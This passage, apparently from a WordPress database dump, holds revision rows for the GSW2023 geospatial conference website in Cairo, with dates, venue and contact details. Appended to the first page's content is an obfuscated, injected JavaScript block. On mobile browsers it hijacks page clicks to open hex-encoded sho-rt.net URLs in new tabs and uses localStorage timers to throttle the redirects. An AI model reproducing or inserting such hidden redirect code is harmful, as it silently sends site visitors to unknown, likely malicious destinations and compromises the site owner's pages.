prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 21:11:13','2022-11-09 21:11:13','',3066,'https://gsw2023.com/?p=3231',0,'revision','',0),
(3232,1,'2022-11-09 21:12:56','2022-11-09 21:12:56','<p>[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"text-align: justify; color: #311b92;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668024005657{margin-top: 25px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020788243{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 